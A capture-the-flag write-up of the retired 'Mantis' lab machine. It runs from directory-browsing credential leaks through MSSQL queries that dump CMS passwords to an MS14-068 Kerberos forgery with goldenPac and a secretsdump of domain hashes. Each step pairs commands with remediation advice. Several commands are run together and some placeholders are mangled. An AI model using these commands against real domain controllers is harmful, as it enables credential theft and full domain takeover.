Mantis
Summary
I scanned a Windows Server 2008 R2 Active Directory domain controller and found IIS 7.5 on two non-standard ports alongside an internet-facing SQL Server 2014 instance. Directory browsing left enabled on port 1337 revealed a developer notes folder; one file — whose name encoded the SQL administrator password in base64 — contained plaintext setup instructions for an OrchardCMS installation, handing over the MSSQL admin credential.
I authenticated to SQL Server, queried the OrchardCMS user table, and read a domain user's password stored in recoverable form — giving valid Active Directory credentials for the account 'james'. Because the domain controller had never been patched against MS14-068, any authenticated domain user can forge a Kerberos ticket claiming Domain Admin membership; Impacket's goldenPac did exactly that, dropping a SYSTEM shell from which both the user and administrator flags were read.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD2="<a-password-you-choose>"
export PASSWORD4="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 1
nmap -sV -sC -p- --min-rate 5000 -oA mantis_full $TARGETExact commands 2
curl -s http://$TARGET:1337/secure_notes/curl -s http://$TARGET:1337/secure_notes/dev_notes_NDA.txt.txtFixDisable IIS directory browsing on all sites and virtual directoriesMedium
Exact commands 2
curl -s http://$TARGET:1337/secure_notes/dev_notes_$PASSWORD4.txt.txtecho '$PASSWORD4' | base64 -d | xxdFixRemove all credential material from web-accessible directories before and after deploymentCritical
Exact commands 3
nxc mssql $TARGET -u admin -p '$PASSWORD2' --local-authnxc mssql $TARGET -u admin -p '$PASSWORD2' --local-auth -q 'SELECT name FROM sys.databases;'nxc mssql $TARGET -u admin -p '$PASSWORD2' --local-auth -q "SELECT COLUMN_NAME FROM orcharddb.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord';"Exact commands 3
nxc mssql $TARGET -u admin -p '$PASSWORD2' --local-auth -q "SELECT UserName, Password FROM orcharddb.dbo.blog_Orchard_Users_UserPartRecord;"nxc smb $TARGET -d htb.local -u james -p "$PASSWORD"nxc ldap $TARGET -d htb.local -u james -p "$PASSWORD"FixNever store Active Directory credentials in the CMS database; enforce one-way password hashingHigh
Exact commands 2
echo "$TARGET mantis htb.local mantis.htb.local" | sudo tee -a /etc/hostsimpacket-goldenPac -dc-ip $TARGET "htb.local/james:$PASSWORD"@$TARGETFixApply MS14-068 patch (KB3011780) immediately and migrate off Windows Server 2008 R2Critical
Exact commands 3
type C:\Users\James\Desktop\user.txttype C:\Users\Administrator\Desktop\root.txtimpacket-secretsdump -just-dc "htb.local/james:$PASSWORD"@$TARGETExposed services
| 53/tcp | domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1) |
| 88/tcp | kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-10 06:33:41Z) |
| 135/tcp | msrpc Microsoft Windows RPC |
| 139/tcp | netbios-ssn Microsoft Windows netbios-ssn |
| 389/tcp | ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |
| 445/tcp | microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB) |
| 464/tcp | tcpwrapped |
| 593/tcp | ncacn_http Microsoft Windows RPC over HTTP 1.0 |
| 636/tcp | tcpwrapped |
| 1337/tcp | http Microsoft IIS httpd 7.5 |
| 1433/tcp | ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM |
| 8080/tcp | http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
| 9389/tcp | mc-nmf .NET Message Framing |
| 49152/tcp | unknown recon-sweep-discovered |
| 49153/tcp | unknown recon-sweep-discovered |
| 49154/tcp | unknown recon-sweep-discovered |
| 49155/tcp | unknown recon-sweep-discovered |
| 49157/tcp | unknown recon-sweep-discovered |
| 49158/tcp | unknown recon-sweep-discovered |
| 49196/tcp | unknown recon-sweep-discovered |
| 50255/tcp | unknown recon-sweep-discovered |